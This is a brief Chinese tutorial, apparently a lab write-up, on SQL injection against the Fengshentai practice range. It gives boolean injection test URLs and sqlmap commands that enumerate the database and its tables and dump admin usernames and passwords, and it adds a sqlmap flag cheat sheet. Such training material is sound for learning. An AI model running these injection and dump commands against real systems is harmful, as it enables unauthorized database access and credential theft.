封神台靶场SQL注入——SQLmap简单使用

靶场地址:封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。

 http://cntj8003.ia.aqlab.cn/?id=1%20and%201=1--+   页面正常

http://cntj8003.ia.aqlab.cn/?id=1%20and%201=2--+  页面不正常

已经可以判断存在注入点

使用sqlmap进行注入

1、首先爆初当前数据库名

 python3 sqlmap.py -u 'http://cntj8003.ia.aqlab.cn/?id=1' --current-db    

封神台靶场SQL注入——SQLmap简单使用_第1张图片

 2、爆当前数据库的所有表

python3 sqlmap.py -u 'http://cntj8003.ia.aqlab.cn/?id=1' -D 'maoshe' --tables

封神台靶场SQL注入——SQLmap简单使用_第2张图片

 3、爆admin表的所有字段

python3 sqlmap.py -u 'http://cntj8003.ia.aqlab.cn/?id=1' -D 'maoshe' -T 'admin' --columns

封神台靶场SQL注入——SQLmap简单使用_第3张图片

 4、爆出username、password中的所有字段内容

python3 sqlmap.py -u 'http://cntj8003.ia.aqlab.cn/?id=1' -D 'maoshe' -T 'admin' -C 'username, password' --dump

封神台靶场SQL注入——SQLmap简单使用_第4张图片

将admin的密码输入,通关

封神台靶场SQL注入——SQLmap简单使用_第5张图片 通过靶场简单练习SQLmap使用

-u  "url"		#检测注入点
--dbs			#列出所有数据库的名称
--current-db	#列出当前数据库的名称
-D				#指定一个数据库
--table			#列出所有表名
-T				#指定表名
--columns		#列出所有字段名
-C				#指定字段
--dump			#列出字段内容

你可能感兴趣的:(安全)